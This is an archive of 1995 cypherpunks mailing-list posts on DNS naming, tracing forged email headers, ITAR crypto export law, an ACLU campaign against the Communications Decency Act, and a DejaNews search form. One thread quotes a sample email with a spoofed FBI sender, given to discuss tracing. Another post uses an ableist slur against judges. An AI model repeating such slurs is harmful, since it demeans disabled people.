To: cypherpunks@toad.com
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <9511061509.AA10512@mhv.net>
Message-ID: <47m051$236@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <9511061509.AA10512@mhv.net>,
Lynne L. Harrison <lharrison@mhv.net> wrote:
>   If, however, the growth continues with people, not only accessing the net,
> but getting domain names - doesn't it seem likely that, at some point, only
> IP addresses will be left (or dumb domain names like http://www.stkdlcp.com)?
>   Ergo, what is the problem with having a numerical URL?

Stability.  Originally DNS was just a handy user-friendly thing, but then
it because the primary way to name a host.  This allowed the IP address
to become irrelevant, which allows entire sites to be renumbered when the
network topology changes.  This is important to keep the routing tables
small (by minimizing the backwards-compatibility exceptions), which is
a critical problem today.  Thus all recent architectural decisions have
been away from direct use of IP addresses anywhere.

DNS zone table size is also a problem; solutions will probably be in the
form of new top-level domains.  You might be see http://fubarco.www or
http://www.ibm or http://www.fubarco.inc, but not http://10.5.23.10.

Neither routing table scaling nor DNS zone scaling is really on-topic;
if you're interested I'll give you some pointers in private mail.
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 7 Nov 1995 11:48:25 +0800
To: tien@well.sf.ca.us (Lee Tien)
Subject: Re: forging headers
In-Reply-To: <199511070249.SAA14921@well.com>
Message-ID: <199511070255.VAA14851@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



You didn't send ALL the headers, only some of them. You need to send
on the full set to make a trace possible.

Lee Tien writes:
> So I got this message.  How would someone identify the sender of this
> message?  I'm writing an article on anonymity, with some discussion of
> remailers, and want to argue that forging already permits people to raise
> the costs of tracing significantly, anonymous remailers or no.  
> 
> Lee
> 
> >From: freeh@fbi.gov
> >Date: Tue, 24 Oct 95 16:07:08 -0400
> >Apparently-To: tien@well.sf.ca.us
> >X-UIDL: 814570964.056
> >
> >> How difficult is it to forge headers?  How difficult is it to trace a
> >> message to the actual sender if the header is forged?
> >
> >Not very difficult at all (to forge, that is).  This is a quick and dirty
> >example that should be somewhat traceable.  If you want pointers on how to
> >trace it, post the whole thing, including headers, to cypherpunks.
> >
> >Louis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Tue, 7 Nov 1995 13:37:01 +0800
To: cypherpunks@toad.com>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511070208.VAA14762@jekyll.piermont.com>
Message-ID: <m0tCewB-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" writes:

: I am starting to have trouble believing you are a lawyer. Are you
: actually telling me that treaties which explicitly indemnify
: transshipment customers against local laws are superceeded by lower
: level laws, in spite of the supremecy clause of the constitution? That
: might be what the state department would tell you, but I'd have
: trouble believing even a lobotomized mongoloid judge would let that
: stand. Treaties are treaties, period.

What I am telling you, if you would pay attention, is that there is no
transhipment involved.  The violation of the ITAR consists of
disclosing information, not shipment.

And that is pretty clearly unconstitutional because it violates the
first amendment, but it has nothing whatsoever to do with any
treaties--certainly nothing to do with treaties about transhipment.

If a Frenchman on vacation in the Riviera shows a copy of PGP sourcecode
to a German businessman there, that is literally a violation of the
ITAR.  If the disclosure is made by sending a copy of the software from
one hotel room to another, and if that message happens to get routed
through the United States, that is still a violation.  The fact that the
message went through the United States is irrelevant.

Don't expect the ITAR to make any sense.  And don't think that you can
apply logic to the ITAR and get logical results.  It doesn't work that
way.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Tue, 7 Nov 1995 13:05:34 +0800
To: cypherpunks@toad.com
Subject: FWD:Religious Right Threatens to Shut Down Net: Call NOW
Message-ID: <9511070330.AA15297@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


>Return-Path: <ACLUNATL@aol.com>
>Date: Mon, 6 Nov 1995 13:43:13 -0500
>From: ACLUNATL@aol.com
>To: beeson@aclu.org
>Subject: Religious Right Threatens to Shut Down Net: Call NOW
>Content-Length: 27519
>
>Here are the advocacy instructions for individuals opposed to the Federal
>Online Indecency Legislation that we promised last week.
>
>========================================================================
>       CAMPAIGN TO STOP THE EXON/COATS COMMUNICATIONS DECENCY ACT
>	(SEE THE LIST OF CAMPAIGN COALITION MEMBERS AT THE END)
>
>	Update: -Latest News:
>		 The Christian Coalition is pushing Congress to censor
>		 the net more heavily than even Sen. J.J. Exon ever imagined.
>	 	 There is the very real possibility that they may succeed.
>
>		 You should be very worried.  We are.
>
>		-What You Can Do Now:
>	 	 Follow the directions below and call House Speaker
>		 Gingrich and Senate Leader Dole.  Implore them
>		 to allow parents to make choices for their children, instead
>		 of government censors.
>
>		 Volunteer to join the fight by helping organize in your
>		 home town.  
>
>        CAMPAIGN TO STOP THE UNCONSTITUTIONAL COMMUNICATIONS DECENCY ACT
>			   Nov 2, 1995
>
>      PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT
>		REDISTRIBUTE ONLY UNTIL December 1, 1995
>	       REPRODUCE THIS ALERT ONLY IN RELEVANT FORUMS
>
>________________________________________________________________________
>CONTENTS
>	The Latest News
>	What You Can Do Now
>	The letter from Ed Meese and the Christian Right
>	Chronology of the CDA
>        For More Information
>        List Of Participating Organizations
>
>________________________________________________________________________
>THE LATEST NEWS
>
>Since the very first day that Senator J.J. Exon (D-NE) proposed censorship
>legislation for the Internet, the Christian Right has pushed for the most
>restrictive regulations they could think of.
>
>The Religious Right (which does not necessarily speak for all religious
>people concerned with this issue) recently tipped their hand in a letter
>to Sen. Larry Pressler (R-SD) and Rep. Thomas Bliley (R-VA) requesting
>a new and more restrictive net censorship proposal.
>
>There are essentially three new dangerous elements of their campaign
>to shut down cyberspace:
>
>
>INTERNET PROVIDERS, ONLINE SERVICES, AND LIBRARIES CRIMINALLY LIABLE FOR
> EXPRESSION ONLINE
>The Religious Right has proposed to hold anyone who provides access to the
>Internet or other interactive media, including online services providers,
>ISP's, BBS's, Libraries, and Schools, criminally liable for all speech
>carried on the network.
>
>In order to avoid liability under this provision, service providers would be
>forced to monitor user's electronic communications to be assured that
>no "indecent" material is transmitted across their networks.
>
>This proposal is MORE RESTRICTIVE than the Exon Communications Decency Act,
>or any other net censorship legislation currently in Congress.
>
>In their letter to Congress, the Religious Right says:
>
>	[Providers] would simply be required to avoid KNOWING violations of
>	the law. [emphasis added]
>
>However, the "knowing" standard is vague enough that the mere knowledge
>that such material exists could be sufficient to trigger criminal liability.
>A single complaint or even a news report could force a service provider to
>take down a web page, remove posts to chat rooms or other discussion
>forums, or shut down listservs in order to avoid going to jail and facing
>huge fines.
>
>
>A STANDARD FOR INDECENCY
>The proposals pushed by the Christian Coalition relies on the
>unconstitutional "indecency standard".  Like the Exon Communications
>Decency Act, the Christian Coalition seeks to regulate all indecent
>speech online.
>
>Indecency is a broad category that includes everything from George Carlin's
>"seven dirty words" to such classic novels and "The Catcher in the Rye" and
>"Lady Chatterly's Lover". 
>
>The Supreme Court has ruled that restrictions on indecent speech are 
>Constitutional only if they rely on the "least restrictive means".  Broad
>indecency restrictions on interactive media do not satisfy the "least
>restrictive means" test, because interactive media allows users and
>parents tremendous control over the information they receive.
>
>Any legislation which attempts to apply an indecency restriction to the 
>Internet is unconstitutional on its face.
>
>The Christian Coalition's proposal that relies on an indecency
>restriction contemplates dumbing down every conversation, web page,
>newsgroup, and mailing list on the Internet to the level of what is
>not offensive to children.
>
>What kind of discussions between adults are possible in an arena
>where everything has been reduced to the level of the Lion King?
>
>
>UNPRECEDENTED CONTROL OVER ONLINE SPEECH FOR THE FCC
>The Christian Coalition would give the FCC broad jurisdiction over
>cyberspace.  It would allow the FCC jurisdiction over your online
>speech, and over the design Internet software, such as web browsers and
>filtering programs that parents can use to control their children's
>access to the Internet.
>
>The Internet has developed from a government project to a market-driven
>economic boom for thousands of businesses.  Giving the FCC authority over
>this medium would significantly hinder the growth of this new industry.
>
>________________________________________________________________________
>WHAT YOU CAN DO NOW
>
>1. The proposals from the Religious Right will literally destroy online
>   speech as we know it.  The odds of stopping this are not certain.
>
>   There is a very real chance that this legislation will pass, and
>   we will experience a period of uncertainty and chilling of speech
>   while an appropriate test case attempts to reach the Supreme Court
>   (should it even get there!)
>
>   The Religious Right has a strong grass-roots network.  We need to
>   counter their energy and ensure cyberspace is not lost due to them.
>
>   IMMEDIATELY CALL House Speaker Gingrich (R-GA) and Senate Leader
>   Dole (R-KS) and urge them to oppose the Christian Coalition's
>   proposal.
>
>   Name, Address, and Party     Phone            Fax
>   ========================     ==============   ==============
>   R GA Gingrich, Newt 		1-202-225-4501   1-202-225-4656
>   R KS Dole, Robert            1-202-224-6521   1-202-224-8952
>
>   If you're at a loss for words, try one of the following:
>
>	Please oppose the recent proposal from the Religious Right to
>	censor the Internet.  The only effective way to address children's
>	access to the Internet is through parental control tools outlined
>	by the Cox/White/Wyden approach.
>   or
>	As a religious person and a parent, I oppose the Religious Right's
>	attempts to censor the Internet.  I am the best person to monitor
> 	my child's access to the Internet using parental control tools
>	as outlined in the Cox/White/Wyden approach.
>  
>2. Join the online fight by becoming a volunteer for your district!
>
>   Check to see if you're legislator is in the list below.  If they are
>   not, consult the free ZIPPER service that matches Zip Codes to
>   Congressional districts with about 85% accuracy at:
>
>	URL:http://www.stardot.com/~lukeseem/zip.html
>
>   The conference committee legislators are:
>   House: Barr (R-GA), Barton (R-TX), Berman (R-CA), Bliley (R-VA),
>	Boucher (D-VA), Brown (D-OH), Bryant (D-TX), Buyer (R-IN),
>	Conyers (D-MI), Dingell (D-MI), Eshoo (D-CA), Fields (R-TX),
>	Flanagan (R-IL), Frisa (R-NY), Gallegly (R-CA), Goodlatte (R-VA),
>	Gordon (D-TN), Hastert (R-IL), Hoke (R-OH), Hyde (R-IL),
>	Jackson-Lee (D-TX), Klug (R-WI), Lincoln (D-AR), Markey (D-MA),
>	Moorhead (R-CA), Oxley (R-OH), Paxon (R-NY), Rush (D-IL),
>	Schaefer (R-CO), Schroeder (D-CO), Scott (D-VA), Stearns (R-FL),
>	White (R-WA)
>   Senate: Burns (R-MT), Exon (D-NE), Ford (D-KY), Gorton (R-WA),
>	Hollings (D-SC), Inouye (D-HI), Lott (R-MS), McCain (R-AZ),
>	Pressler (R-SD), Rockefeller (D-WV), Stevens (R-AK)
>
>   If your legislator is on the conference committee, you have a chance
>   to influence their vote on this issue with your power as a constituent.
>   Volunteer to help educate your legislator by sending mail to
>   volunteer@vtw.org.  A coalition volunteer will be in touch with you.
>
>   You can starting working to help spread the word in your district by
>   sending this letter to five friends.  Ask them to call Dole and Gingrich
>   as well.
>
>3. The People for the American Way (PFAW) and the American Civil Liberties
>   Union are organizing a letter from ORGANIZATIONS to the Conference
>   Committee to oppose the censorship provisions.
>
>   If you are a representative of an organization that would like to
>   signon to this letter, you should contact jlesser@pfaw.org IMMEDIATELY. 
>
>4. We can't suggest relaxing at this point.  The stakes are too high, and
>   the risk is too great.  Everything now hangs in the balance.
>
>________________________________________________________________________
>THE LETTER FROM ED MEESE AND THE CHRISTIAN RIGHT
>
>October 16, 1995
> 
>The Honorable Thomas J. Bliley, Jr.  Chairman
>Committee on Commerce
>United States House of Representatives
>Washington, DC 20515
> 
>The Honorable Larry Pressler, Chairman
>Committee on Commerce, Science, and Transportation
>United States Senate
>Washington, DC 20510
> 
>Re: Computer Pornography Provisions in Telecommunications Bill
> 
>Dear Mr. Chairmen:
> 
>We are writing to urge the conference committee seeking to reconcile the
>telecommunications bills passed by the House and Senate include in the
>final bill the strongest possible criminal law provisions to address the
>growing and immediate problem of computer pornography without any
>exemptions, defenses, or political favors of any kind accorded to those
>who knowingly participate in the distribution of obscenity to anyone or
>indecency to children. While there is no perfect solution to the problem
>of computer pornography, Congress could not hope to solve this problem by
>holding liable only some who are responsible for the problem.
> 
>The recent Justice Department prosecution project targeting those who
>violated federal child pornography law using America On-Line is
>instructive in this regard. More than ninety individuals were targeted for
>prosecution although many others, perhaps as many as 3,000 according to
>one press report, were originally targeted by the Department of Justice as
>potential violators of child pornography laws. Apparently due to a
>shortage of investigative and prosecutorial resources, the project was
>limited. Since there are insufficient resources to investigate and
>prosecute but a fraction of those that are trafficking in child
>pornography by computer, then there will likely be even fewer resources
>available to investigate and prosecute those involved in obscenity and
>indecency.
> 
>Thousands of individuals both in this country and abroad are regularly
>placing obscenity and indecency on the Internet. It is not possible to
>make anything more than a dent in the serious problem of computer
>pornography if Congress is willing to hold liable only those who place
>such material on the Internet while at the same time giving legal
>exemptions or defenses to service or access providers who profit from and
>are instrumental to the distribution of such material. The Justice
>Department normally targest the major offenders of laws. In obscenity
>cases prosecuted to date, it has targeted large companies which have been
>responsible for the nationwide distribution of obscenity and who have made
>large profits by violating federal laws. Prosecution of such companies has
>made a substantial impact in curbing the distribution of obscenity, with
>many such offenders going out of business altogether. So too will
>prosecution of access providers which _knowingly_ traffic in obscenity
>have a substantial impact, a far greater impact than just the prosecution
>of a person who places one or a few prohibited images on the Internet.
>Such a person could not traffic in pornography without the aid or
>facilitation of the service or access providers. Indeed, if Congress
>includes provisions protecting access or service providers in whatever
>bill is finally passed, it is likely that most in this country who are
>trafficking in indecency to children or obscenity would continue to do so
>since the threat of prosecution would be minuscule, given the numbers of
>those currently involved in this activity. It is also likely that those
>outside our country who are engaged in these activities would continue to
>do so since it would be nearly impossible to extradite them to the United
>States for prosecution. Thus, unless all who knowingly participate in such
>matters are subject to the law, the Internet will remain the same and
>Congress will have failed in its responsibilities to the children and
>families of America.
> 
>Federal law has traditionally assigned equal liability both for those who
>commit a crime and those who aid and abet a crime. See Title 18 U.S.C.
>Code Section 2: "(a) whoever [sic] commits an offense against the United
>States or aids, abets, councils [sic], commands, induces, or procures its
>commission, is punishable as a principle [sic]." Service or access
>providers who knowingly participate in the distribution of indecency to
>children or in obscenity to anyone are aiders and abettors in the
>commission of those crimes and thus should have liability under any law
>Congress passes. Current federal law on child pornography provides no no
>exemption or defense for access providers. Thus, the child pornography law
>provides a strong deterrent against trafficking in child pornography for
>those who would otherwise knowingly participate in its distribution by
>computer whether pedophile or access provider.
> 
>The changes in law which we support would not hold an access provider
>criminally liable for all illegal pornography on the Internet which their
>services may be used to obtain. Nor would it require that access providers
>check all communications to ensure that no violations of the law are
>occurring. They would simply be required to avoid knowing violations of
>the law. This is an obligation imposed on all citizens. Technology exists
>today for access providers, through a simple process, to target or flag
>and remove files containing objectionable material.
> 
>We support the House-passed language insofar as it addresses obscenity by
>amendment Title 18, Sections 1462, 1465, and 1467 of the United States
>Code. The provision restricting transmission of indecency in the House-passed
>bill, an amendment to Section 1465, is inadequate, and we urge that it be
>substantially revised.
> 
>Attached is the specific language we support which includes the House
>passed language on obscenity and includes revisions on both the House
>passed language on indecency, which would amend Title 18 and the
>Senate-passed language on indecency, which would amend Title 47. The
>combination of these provisions, we believe, would provide effective laws
>to curb obscenity and indecency on the Internet by establishing that all
>who knowingly participate in the distribution or facilitation of obscenity
>to anyone or indecency to children would be subject to the law.
> 
>Thank you for your concern and attention to this matter.
> 
> 
>[signed]
> 
>Edwin Meese III
> 
>Ralph Reed
>Christian Coalition
> 
>Donald E. Wildmon
>American Family Association
> 
>Alan Sears, Former Executive Director
>Atty General's Commission on Pornography
> 
>Phyllis Shafly
>Eagle Forum
> 
>Beverly LaHaye
>Concerned Women for America
> 
>Reverend Louis P. Sheldon
>Traditional Values Coalition
> 
>Jay Sekulow
>American Center for Law and Justice
> 
>Paul Weyrich
>Free Congress Foundation
> 
>Paul McGeady
>Morality in Media
> 
>Len Munsil
>National Family Legal Foundation
> 
>Robert Peters
>Morality in Media
> 
>Kenneth Sukhia
>Former United States Attorney, N.D., FL
>Former Chairman, Atty General's Advisory Committee
>Subcommittee on Child Exploitation and Obscenity
>
>
>--------------------------
>
> 
>Section 1465 of Title 18, United States Code, is amended to punish
>distribution by computer of indecent material to minors by adding at the
>end the following:
> 
>Whoever knowingly communicates, transmits, or makes available for
>communication or transmission, in or effecting interstate or foreign
>commerce an indecent communication by computer to any person the
>communicator or transmitter believes has not attained the age of 18 years
>of age, knowing that such communication will be obtained by a person
>believed to be under 18 years of age, shall be fined under this title or
>imprisoned not more than five years, or both.
> 
>TITLE IV -- OBSCENE, HARASSING, AND WRONGFUL UTILIZATION OF
>TELECOMMUNICATIONS FACILITY
> 
>SEC. 401. SHORT TITLE
>         This title may be cited as the "Communications Decency Act of
>1995".
> 
>Sec. 402. OBSCENE OR HARASSING USE OF TELECOMMUNICATIONS FACILITIES UNDER
>THE COMMUNICATIONS ACT OF 1934
> 
>Section 223 (47 U.S.C. 223) is amended --
>   (1) by striking subsection (a) and inserting in lieu of [sic]:
> ``(a) Whoever--
>    ``(1) in the District of Columbia or in interstate or foreign
>communications --
>        ``(A) by means of telecommunications device knowingly--
>          ``(i) makes, creates, or solicits, and
>          ``(ii) initiates the transmission of,
>     any comment, request, suggestion, proposal, image, or other
>     communication which is obscene, lewd, lascivious, filthy, or
>     indecent, with intent to annoy, abuse, threaten, or harass
>     another person;
>         ``(B) makes a telephone call or utilizes a
>     telecommunications device, whether or not conversation or
>     communication ensues, without disclosing his identity and
>     with intent to annoy, abuse, threaten, or harass any person
>     at the called number or who receives the communication;
>         ``(C) makes or causes the telephone of another repeatedly
>     or continuously to ring, with intent to harass any person at
>     the called number; or
>         ``(D) makes repeated telephone calls or repeatedly
>     initiates communication with a telecommunications device,
>     during which conversation or communication ensues, solely to
>     harass any person at the called number or who receives the
>     communication;
>      ``(2) knowingly permits any telecommunications facility
>     under his control to be used for any activity prohibited by
>     paragraph (1) with the intent that it be used for
>     such activity,
> 
>  shall be fined not more than $100,000 or imprisoned not more
>  than two years, or both.''; and
> 
>   (2) by adding at the end the following new subsections:
> 
> ``(d) Whoever--
>       ``(1) knowingly within the United States or in foreign
>     communications with the United States by means of
>     telecommunications device makes or makes available any
>     indecent communication in any form including any comment,
>     request, suggestion, proposal, or image, to any person under
>     18 years of age regardless of whether the
>     maker of such communication placed the call or initiated the
>     communication; or
>       ``(2) knowingly permits any telecommunications facility
>     under such person's control to be used for an activity
>     prohibited by paragraph (1) with the intent that it be
>     used for such activity,
>  shall be fined not more than $100,000 or imprisoned not more
>  than two years or both.
>      ``(e) Defenses to subsections (a) and (d), restrictions on 
>     access, judicial remedies respecting restrictions for
>     persons providing information services and
>     access to information services--
>      "(1) It is a defense to prosecution that a person has complied
>     with regulations designed to restrict access to indecent
>     communications to those 18 years old or older as enacted by the
>     Federal Communications Commission which shall prepare final 
>     regulations within 120 days of the passage of this bill. Until
>     such regulations become effective, it is a defense to
>     prosecution that the person has blocked or restricted access
>     to indecent communications to any person under 18 years
>     of age through the use of verified credit card, adult access
>     code, or adult personal identification number (PIN).   
>     Nothing in this subsection shall be construed to treat
>     enhanced information services as common carriage."
>       "(2) No cause of action may be brought in any
>     court or any administrative agency against any person on account
>     of any activity which is not in violation of any law punishable
>     by criminal or civil penalty, which activity the person has taken in
>     good faith to implement a defense authorized under this section or
>     otherwise to restrict or prevent the transmission of, or access to,
>     a communication specified in this section.
>     (f) Nothing in this subsection shall preclude any State or
>     local government from enacting and enforcing laws and regulations
>     which do not result in the imposition of inconsistent obligations on
>     the provision of interstate services.  Nothing in this subsection
>     shall preclude any State or local government from governing conduct
>     not covered by subsection (d)(2)."
>     (g) Nothing in subsection (a), (d), or (e) or in the
>     defenses to prosecution under (e) shall be construed
>     to affect or limit the application or enforcement of any other
>     Federal law.
>     (h) The use of the term 'telecommunications device' in this
>     section shall not impose new obligations on (one-way) broadcast
>     radio or (one-way) broadcast television operators licensed by the
>     Commission or (one-way) cable services registered with the
>     Federal Communications Commission and covered by obscenity and
>     indecency provisions elsewhere in this Act.
> 
>Sec. 403. OBSCENE PROGRAMMING ON CABLE TELEVISION.
> 
>        Section 639 (47 U.S.C. 559) is amended by striking "10,000" and
>inserting "$100,000"
> 
>Sec. 404. BROADCASTING OBSCENE LANGUAGE ON THE RADIO.
> 
>        Section 1466 of Title 18, United States Code, is amended by
>striking out "$10,000" and inserting "$100,000".
> 
>Sec. 405 SEPARABILITY
> 
>        "(a) If any provision of this Title, including amendments to this
>Title of [sic] the application thereof to any person or circumstance is
>held invalid, the remainder of this Title and the application of such
>provision to other persons or circumstances shall not be affected
>thereby."
>
>________________________________________________________________________
>CHRONOLOGY OF THE COMMUNICATIONS DECENCY ACT
>
>Sep 26, '95	Sen. Russ Feingold urges committee members to drop
>		Managers Amendment and the CDA from the Telecommunications
>		Deregulation bill
>Aug  4, '95	House passes HR1555 which goes into conference with S652.
>Aug  4, '95	House votes to attach Managers Amendment (which contains
>		new criminal penalties for speech online) to
>		Telecommunications Reform bill (HR1555).
>Aug  4, '95	House votes 421-4 to attach HR1978 to Telecommunications
>	 	Reform bill (HR1555).
>Jun 30, '95	Cox and Wyden introduce the "Internet Freedom and Family
>		Empowerment Act" (HR 1978) as an alternative to the CDA.
>Jun 21, '95     Several prominent House members publicly announce their
>                opposition to the CDA, including Rep. Newt Gingrich (R-GA),
>                Rep. Chris Cox (R-CA), and Rep. Ron Wyden (D-OR).
>Jun 14, '95     The Senate passes the CDA as attached to the Telecomm
>                reform bill (S 652) by a vote of 84-16.  The Leahy bill
>                (S 714) is not passed.
>May 24, '95     The House Telecomm Reform bill (HR 1555) leaves committee
>                in the House with the Leahy alternative attached to it,
>                thanks to Rep. Ron Klink of (D-PA).  The Communications
>                Decency Act is not attached to it.
>Apr  7, '95     Sen. Leahy (D-VT) introduces S.714, an alternative to
>                the Exon/Gorton bill, which commissions the Dept. of
>                Justice to study the problem to see if additional legislation
>                (such as the CDA) is necessary.
>Mar 23, '95     S314 amended and attached to the telecommunications reform
>                bill by Sen. Gorton (R-WA).  Language provides some provider
>                protection, but continues to infringe upon email privacy
>                and free speech.
>Feb 21, '95     HR1004 referred to the House Commerce and Judiciary
>committees
>Feb 21, '95     HR1004 introduced by Rep. Johnson (D-SD)
>Feb  1, '95     S314 referred to the Senate Commerce committee
>Feb  1, '95     S314 introduced by Sen. Exon (D-NE) and Gorton (R-WA).
>
>________________________________________________________________________
>FOR MORE INFORMATION
>
>Web Sites
>        URL:http://www.vtw.org/exon/
>        URL:http://epic.org/
>        URL:http://www.eff.org/pub/Alerts/
>        URL:http://www.cdt.org/cda.html
>	URL:http://outpost.callnet.com/outpost.html
>
>FTP Archives 
>        URL:ftp://ftp.cdt.org/pub/cdt/policy/freespeech/00-INDEX.FREESPEECH
>        URL:ftp://ftp.eff.org/pub/Alerts/
>
>Gopher Archives:
>        URL:gopher://gopher.panix.com/11/vtw/exon
>        URL:gopher://gopher.eff.org/11/Alerts
>
>Email:
>        vtw@vtw.org (put "send alert" in the subject line for the latest
>		alert, or "send cdafaq" for the CDA FAQ)
>        cda-info@cdt.org (General CDA information)
>        cda-stat@cdt.org (Current status of the CDA)
>
>________________________________________________________________________
>LIST OF PARTICIPATING ORGANIZATIONS
>
>In order to use the net more effectively, several organizations have
>joined forces on a single Congressional net campaign to stop the
>Communications Decency Act.
>
>American Civil Liberties Union * American Communication Association *
>American Council for the Arts * Arts & Technology Society * Association
>of Alternative Newsweeklies * biancaTroll productions * Boston
>Coalition for Freedom of Expression * Californians Against Censorship
>Together * Center For Democracy And Technology * Centre for Democratic
>Communications * Center for Public Representation * Citizen's Voice -
>New Zealand * Cloud 9 Internet *Computer Communicators Association *
>Computel Network Services * Computer Professionals for Social
>Responsibility * Cross Connection * Cyber-Rights Campaign * CyberQueer
>Lounge * Dutch Digital Citizens' Movement * ECHO Communications Group,
>Inc. * Electronic Frontier Canada * Electronic Frontier Foundation *
>Electronic Frontier Foundation - Austin * Electronic Frontiers
>Australia * Electronic Frontiers Houston * Electronic Frontiers New
>Hampshire * Electronic Privacy Information Center * Feminists For Free
>Expression * First Amendment Teach-In * Florida Coalition Against
>Censorship * FranceCom, Inc. Web Advertising Services * Friendly
>Anti-Censorship Taskforce for Students * Hands Off!  The Net * Inland
>Book Company * Inner Circle Technologies, Inc. * Inst. for Global
>Communications * Internet On-Ramp, Inc. * Internet Users Consortium *
>Joint Artists' and Music Promotions Political Action Committee * The
>Libertarian Party * Marijuana Policy Project * Metropolitan Data
>Networks Ltd. * MindVox * MN Grassroots Party * National Bicycle
>Greenway * National Campaign for Freedom of Expression * National
>Coalition Against Censorship * National Gay and Lesbian Task Force *
>National Public Telecomputing Network * National Writers Union * Oregon
>Coast RISC * Panix Public Access Internet * People for the American Way
>* Republican Liberty Caucus * Rock Out Censorship * Society for
>Electronic Access * The Thing International BBS Network * The WELL *
>Voters Telecommunications Watch
>
>(Note: All 'Electronic Frontier' organizations are independent entities,
> not EFF chapters or divisions.)
>
>________________________________________________________________________
>	End Alert
>========================================================================
>
>

********************************************************************
Lynne L. Harrison, Esq.
Poughkeepsie, New York 
lharrison@mhv.net

"Say not, 'I have found the truth', but rather, 'I have found a truth.'"
                         - Kahlil Gibran from "The Prophet"
********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 7 Nov 1995 13:33:54 +0800
To: cypherpunks@toad.com>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511070208.VAA14762@jekyll.piermont.com>
Message-ID: <9511070341.AA15892@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Perry chips in :
>"Peter D. Junger" writes:
>> The trouble is that the ITAR's definition of export that is relevant
>> to cryptographic software has nothing to do with exporting in the
>> normal sense, and therefore it has nothing to do with transhipments.

>I am starting to have trouble believing you are a lawyer. Are you
>actually telling me that treaties which explicitly indemnify
>transshipment customers against local laws are superceeded by lower
>level laws, in spite of the supremecy clause of the constitution? That
>might be what the state department would tell you, but I'd have
>trouble believing even a lobotomized mongoloid judge would let that
>stand. Treaties are treaties, period.

Actually there are exclusion clauses in most international trade treaties
to exclude items such as arms and drugs from transhipment clauses.
There are also various treaties to control trafic in arms and drugs whose
provisions may have precedence.

The US is not known for sticking to the narrow wording of an international
treaty in such cases. Panama was invaded for alledged transhipment of drugs
after all. I doubt anyone would seriously attempt to find a justification
for that act in international law. 

One of the many problems in Perry's approach is that an international treaty
is in essence a contract between governments. If the governments chose
to interpret a contract in a particular way they may not consider it any of
your buisness as a third party. They are after all always free to 
negotiate a new treaty.


Perry's somewhat offensive language is not a substitute for an argument.
Treaties certainly arn't "treaties period" otherwise the profession of
law would be a somewhat less skilled one. There is clearly considerable
complexity in the interpretation of treaties and in determining the
scope of their application, the various remedies they provide for and so
on. 

I think I would take Perry's disbelief that a person is a lawyer becuse
he disagrees with him as reflecting more on Perry than anyone else.
All contrary views are rejected... hmm...


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 08:28:10 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again--a URL for Usenet Searching
In-Reply-To: <acc3adfa0702100476eb@[205.199.118.202]>
Message-ID: <47m326$349@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <acc3adfa0702100476eb@[205.199.118.202]>,
Timothy C. May <tcmay@got.net> wrote:
> I usually avoid passing on URLs of interesting sites, in the name of
> conserving bandwidth (*), but this one really has me jazzed:
> 
> http://dejanews.com/

Equally interesting is the author profile feature.  They don't provide
a perfectly convenient way to access it, so use this form.

<head>
<title>DejaNews author profile quickskip</title>
</head>
<body>

<form action="http://marge.dejanews.com/cgi-bin/dnauthor-profile.tcl">
<p><input type=text size=64 name=author value="shields@tembel.org"></p>
<p><input type=submit></p>
</form>

<p>DejaNews is here</p>

</body>
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Tue, 7 Nov 1995 13:40:23 +0800
To: perry@piermont.com
Subject: Re: forging headers
In-Reply-To: <199511070255.VAA14851@jekyll.piermont.com>
Message-ID: <199511070353.DAA01678@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> You didn't send ALL the headers, only some of them. You need to send
> on the full set to make a trace possible.

More specifically, the headers which are most needed are the Received:
and Message-Id: headers; each mailer along the path adds another
Received; header, typically with its name, a timestamp, and sometimes
the name or address of the previous system.  

Other headers may also help.

> Lee Tien writes:
> > So I got this message.  How would someone identify the sender of this
> > message?  I'm writing an article on anonymity, with some discussion of
> > remailers, and want to argue that forging already permits people to raise
> > the costs of tracing significantly, anonymous remailers or no.  

						- Bill

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMJ7YHrT+rHlVUGpxAQHfSgP/YDoEM9chlFLNZ1U4nzh6T13Lsswqv768
oTpssqzW+OYenKgop7FOGYIs7GpSdSGdgFyucYHlcBkUpVXOLMcs/pylwIVGy8Hl
T/lrsNEjAEBjWlzZO6jSuKvrODZKGGfn7nTvmmCR8vKRtUlLnK3ljK8VphqpYvbm
Nmg6okhczZM=
=JO4Z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 7 Nov 1995 22:31:08 +0800
To: hallam@w3.org
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <9511070341.AA15892@zorch.w3.org>
